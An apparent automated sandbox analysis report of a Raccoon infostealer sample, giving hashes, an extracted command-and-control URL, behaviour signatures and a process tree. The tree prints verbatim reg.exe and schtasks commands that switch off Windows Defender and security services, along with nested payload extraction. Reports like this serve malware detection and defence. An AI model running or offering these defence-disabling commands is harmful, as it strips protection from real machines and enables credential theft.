Analysis

  • max time kernel
    4294183s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20220311-en
  • submitted
    25-03-2022 23:17

General

  • Target

    369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe

  • Size

    16.3MB

  • MD5

    3d15320984eaa8f6e04b0ff5b5df1e6c

  • SHA1

    bc9dae6bc1f6908ae5c1ca1525a026103ba5825b

  • SHA256

    369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316

  • SHA512

    3dadb99c5222843069b1b287001be2097b86efd40182cb3131df63926b9e7c53235c80133853be0ec71793e4d82d41337658125013a481b88faf7cc51c85d16a

Malware Config

Extracted

Family

raccoon

Version

1.7.1-hotfix

Botnet

5eaa41b3101d5537f786a35da1878f0d1d760e53

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

c763e433ef51ff4b6c545800e4ba3b3b1a2ea077

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 2 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 8 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Executes dropped EXE 34 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 56 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe
    "C:\Users\Admin\AppData\Local\Temp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1356
    • C:\Users\Admin\AppData\Local\Temp\is-OHOET.tmp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-OHOET.tmp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.tmp" /SL5="$3014E,16368734,778240,C:\Users\Admin\AppData\Local\Temp\369f0cf17ebf1d3ec9c40d08a760910eeb18687dca3e96c71dee12b877b90316.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:972
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\44xUGQ\MMF.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\44xUGQ\DisableOAVProtection.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Windows\SysWOW64\reg.exe
            reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
            5⤵
              PID:1544
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              5⤵
                PID:1516
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                5⤵
                  PID:1556
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  5⤵
                    PID:1664
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    5⤵
                      PID:1072
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                      5⤵
                        PID:1952
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                        5⤵
                          PID:1296
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          5⤵
                            PID:2024
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:1988
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                              5⤵
                                PID:1400
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                5⤵
                                  PID:2032
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                  5⤵
                                    PID:876
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                    5⤵
                                      PID:572
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      5⤵
                                        PID:1904
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:1748
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                          5⤵
                                            PID:1716
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                            5⤵
                                              PID:968
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              5⤵
                                                PID:704
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                5⤵
                                                  PID:780
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                  5⤵
                                                    PID:1604
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                    5⤵
                                                      PID:1936
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                      5⤵
                                                        PID:1544
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                        5⤵
                                                          PID:1608
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                          5⤵
                                                            PID:836
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                            5⤵
                                                              PID:1752
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                              5⤵
                                                                PID:1200
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                5⤵
                                                                  PID:872
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                  5⤵
                                                                    PID:912
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                    5⤵
                                                                      PID:1564
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                      5⤵
                                                                        PID:588
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                        • Modifies security service
                                                                        PID:1176
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                        5⤵
                                                                          PID:1992
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ""C:\ProgramData\44xUGQ\main.bat" "
                                                                        4⤵
                                                                        • Loads dropped DLL
                                                                        PID:1956
                                                                        • C:\Windows\SysWOW64\mode.com
                                                                          mode 65,10
                                                                          5⤵
                                                                            PID:1612
                                                                          • C:\ProgramData\44xUGQ\7z.exe
                                                                            7z.exe e file.zip -p___________23294pwd8589pwd29032___________ -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1768
                                                                          • C:\ProgramData\44xUGQ\7z.exe
                                                                            7z.exe e extracted/file_10.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:656
                                                                          • C:\ProgramData\44xUGQ\7z.exe
                                                                            7z.exe e extracted/file_9.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:368
                                                                          • C:\ProgramData\44xUGQ\7z.exe
                                                                            7z.exe e extracted/file_8.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1052
                                                                          • C:\ProgramData\44xUGQ\7z.exe
                                                                            7z.exe e extracted/file_7.zip -oextracted
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1200
                                                                          • C:\ProgramData\44xUGQ\7z.exe
                                                                            7z.exe e extracted/file_6.zip -oextracted
                                                                            5⤵
                                                                              PID:1988
                                                                            • C:\ProgramData\44xUGQ\7z.exe
                                                                              7z.exe e extracted/file_5.zip -oextracted
                                                                              5⤵
                                                                                PID:1404
                                                                              • C:\ProgramData\44xUGQ\7z.exe
                                                                                7z.exe e extracted/file_4.zip -oextracted
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1080
                                                                              • C:\ProgramData\44xUGQ\7z.exe
                                                                                7z.exe e extracted/file_3.zip -oextracted
                                                                                5⤵
                                                                                  PID:848
                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                  7z.exe e extracted/file_2.zip -oextracted
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:544
                                                                                • C:\ProgramData\44xUGQ\7z.exe
                                                                                  7z.exe e extracted/file_1.zip -oextracted
                                                                                  5⤵
                                                                                    PID:2024
                                                                                  • C:\ProgramData\44xUGQ\xmhost.exe
                                                                                    "xmhost.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Loads dropped DLL
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1936
                                                                                    • C:\ProgramData\44xUGQ\xmhost.exe
                                                                                      "C:\ProgramData\44xUGQ\xmhost.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1092
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 184
                                                                                        7⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:1680
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c ""C:\ProgramData\44xUGQ\DiskRemoval.bat" "
                                                                                  4⤵
                                                                                    PID:2000
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /T 60 /NOBREAK
                                                                                      5⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:1600
                                                                                • C:\Program Files (x86)\avastvpn.exe
                                                                                  "C:\Program Files (x86)\avastvpn.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1708
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-L7K4H.tmp\avastvpn.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-L7K4H.tmp\avastvpn.tmp" /SL5="$101BA,8012383,778240,C:\Program Files (x86)\avastvpn.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:440
                                                                                    • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                      "C:\Program Files (x86)\avast_secureline_setup.exe"
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                      • Modifies system certificate store
                                                                                      PID:476
                                                                                      • C:\Windows\Temp\asw-208a2850-2d93-4c44-adf6-f9e3ff924ffe\common\icarus.exe
                                                                                        C:\Windows\Temp\asw-208a2850-2d93-4c44-adf6-f9e3ff924ffe\common\icarus.exe /icarus-info-path:C:\Windows\Temp\asw-208a2850-2d93-4c44-adf6-f9e3ff924ffe\icarus-info.xml /install
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Writes to the Master Boot Record (MBR)
                                                                                        • Checks processor information in registry
                                                                                        PID:2028
                                                                                        • C:\Windows\Temp\asw-208a2850-2d93-4c44-adf6-f9e3ff924ffe\common\icarus_ui.exe
                                                                                          C:\Windows\Temp\asw-208a2850-2d93-4c44-adf6-f9e3ff924ffe\common\icarus_ui.exe /er_master:master_ep_2c666e8e-0447-48d3-9e29-bd6689b24523 /er_ui:ui_ep_025a79f0-b168-4ae7-9a4a-6814a18b2bbf
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:588
                                                                                        • C:\Windows\Temp\asw-208a2850-2d93-4c44-adf6-f9e3ff924ffe\avast-vpn\icarus.exe
                                                                                          C:\Windows\Temp\asw-208a2850-2d93-4c44-adf6-f9e3ff924ffe\avast-vpn\icarus.exe /er_master:master_ep_2c666e8e-0447-48d3-9e29-bd6689b24523 /er_ui:ui_ep_025a79f0-b168-4ae7-9a4a-6814a18b2bbf /er_slave:avast-vpn_slave_ep_9084dc2d-85f5-4074-803e-b17f0e6635b7 /slave:avast-vpn
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Writes to the Master Boot Record (MBR)
                                                                                          • Checks processor information in registry
                                                                                          PID:1588
                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\ProgramData\xOUvu\MMF.vbs"
                                                                                      5⤵
                                                                                        PID:1212
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c ""C:\ProgramData\xOUvu\DisableOAVProtection.bat" "
                                                                                          6⤵
                                                                                            PID:636
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                              7⤵
                                                                                                PID:1676
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                7⤵
                                                                                                  PID:556
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                  7⤵
                                                                                                    PID:1116
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                    7⤵
                                                                                                      PID:1360
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                      7⤵
                                                                                                        PID:980
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                        7⤵
                                                                                                          PID:2032
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                          7⤵
                                                                                                            PID:1648
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                            7⤵
                                                                                                              PID:1656
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                              7⤵
                                                                                                                PID:592
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2024
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                7⤵
                                                                                                                  PID:1296
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                  7⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1956
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                                                                  7⤵
                                                                                                                    PID:1752
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                    7⤵
                                                                                                                      PID:1160
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                      7⤵
                                                                                                                        PID:1560
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                        7⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:848
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                        7⤵
                                                                                                                          PID:552
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                          7⤵
                                                                                                                            PID:1400
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                            7⤵
                                                                                                                              PID:1828
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                              7⤵
                                                                                                                                PID:2032
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                                                                7⤵
                                                                                                                                  PID:1796
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                                                                  7⤵
                                                                                                                                    PID:1752
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                    7⤵
                                                                                                                                      PID:984
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                      7⤵
                                                                                                                                        PID:1932
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                                                                        7⤵
                                                                                                                                          PID:1296
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                          7⤵
                                                                                                                                            PID:1160
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            7⤵
                                                                                                                                              PID:1356
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                              7⤵
                                                                                                                                                PID:1768
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                7⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:676
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                7⤵
                                                                                                                                                  PID:1712
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  7⤵
                                                                                                                                                  • Modifies security service
                                                                                                                                                  PID:2044
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                  7⤵
                                                                                                                                                    PID:552
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c ""C:\ProgramData\xOUvu\main.bat" "
                                                                                                                                                  6⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:1524
                                                                                                                                                  • C:\Windows\SysWOW64\mode.com
                                                                                                                                                    mode 65,10
                                                                                                                                                    7⤵
                                                                                                                                                      PID:676
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e file.zip -p___________12659pwd5006pwd7116___________ -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:564
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_10.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2036
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1748
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1092
                                                                                                                                                    • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                      7z.exe e extracted/file_11.zip -oextracted
                                                                                                                                                      7⤵
                                                                                                                                                        PID:848
                                                                                                                                                      • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                        7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                        7⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:1756
                                                                                                                                                      • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                        7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                        7⤵
                                                                                                                                                          PID:676
                                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                          7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1200
                                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                          7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1740
                                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                          7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                          7⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1544
                                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                          7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                          7⤵
                                                                                                                                                            PID:2028
                                                                                                                                                          • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                                            7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:592
                                                                                                                                                          • C:\ProgramData\xOUvu\SgrmClientApi.exe
                                                                                                                                                            "SgrmClientApi.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Loads dropped DLL
